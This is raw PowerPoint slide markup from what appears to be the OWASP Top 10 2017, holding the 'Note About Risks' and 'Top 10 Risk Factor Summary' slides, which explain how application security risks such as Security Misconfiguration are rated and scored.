                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> impact factor (technical impact). </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>The prevalence of a weakness is </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t>a factor that you typically don’t have to calculate. For prevalence data, we have been supplied prevalence statistics from a number of different organizations (as referenced in the Attribution section on page 4) and we have averaged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1000" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Top 10 (the higher the result the higher the risk).  </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Note that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1000" u="none" baseline="0" dirty="0"/>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0"/>
                        <a:t>Your organization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> will have to decide how much security risk from applications and APIs </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0"/>
                        <a:t>the organization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>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1000" baseline="0" dirty="0"/>
                        <a:t>The following illustrates our calculation of the risk for </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0"/>
                        <a:t>A6:2017-Security Misconfiguration</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>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383354302"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="121920" y="6324600"/>
          <a:ext cx="6629400" cy="2699887"/>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25253">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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a:solidFill>
                          <a:schemeClr val="bg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491782">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> Specific</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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>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Prevalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>WIDESPREAD</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>EASY</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1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Technical</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>MODERATE</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1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>App / Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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489418">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="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endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>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rPr>
                        <a:t>Average=</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" kern="0" dirty="0"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" kern="0" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>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a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" kern="0" baseline="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505200" y="8545588"/>
            <a:ext cx="1028819" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Textplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>+R</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Note About Risks</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Gruppieren 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="152400" y="6451798"/>
            <a:ext cx="5820810" cy="390006"/>
            <a:chOff x="46590" y="1058047"/>
            <a:chExt cx="5820810" cy="390006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="46590" y="1058047"/>
              <a:ext cx="5820810" cy="386519"/>
              <a:chOff x="46590" y="1070390"/>
              <a:chExt cx="58208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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="36" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="493228" y="1105375"/>
                <a:ext cx="139700" cy="305289"/>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37" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="46590" y="1073624"/>
                <a:ext cx="516488" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>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Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>           Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>          Weakness</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="38" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="202779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pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{105A35D7-3B85-4A53-AF32-58A83A690AE3}"/>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1752600" y="7696200"/>
            <a:ext cx="2322514" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4327DDFD-3A4D-4FEC-9751-B8F70C80FFBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect t="34128" r="22830" b="30544"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2859086" y="8229600"/>
            <a:ext cx="2322514" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>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3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3090365402"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="1295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3850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Top 10 Risk Factor Summary</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>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The following table presents a summary of the 2017 Top 10 Application Security Risks, and the risk factors we have assigned to each risk. These factors were determined based on the available</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> statistics and the experience of the OWASP Top 10 team</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. To</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> understand these risks for a particular application or organization, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="sng" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>you must consider your own specific threat agents and business impacts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. Even severe software weaknesses may not present a serious risk if there are no threat agents in a position to perform the necessary attack or the business impact is negligible for the assets involved.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00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3057930399"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial"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a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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Arial"/>
                          <a:cs typeface="Arial"/>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Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A1:2017-</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>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dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>8.0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Arial"/>
                          <a:cs typeface="Arial"/>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Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A3:2017-</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Sens.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> Data Exposure</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A4:2017-XML External Entity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7.0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Arial"/>
                          <a:cs typeface="Arial"/>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chemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>COMMON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AVERAGE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SEVERE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg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chemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">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chemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-Security Misconfiguration</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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chemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD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baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>EASY</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bg2"/>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bg2"/>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chemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MODERATE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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Arial"/>
                          <a:cs typeface="Arial"/>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FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>EASY</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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6.0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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial"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Wingdings"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings"/>
                        <a:cs typeface="Arial"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lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>COMMON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baseline="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FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>SEVERE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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5.0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Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A9:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Vulnerable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Components</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ct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
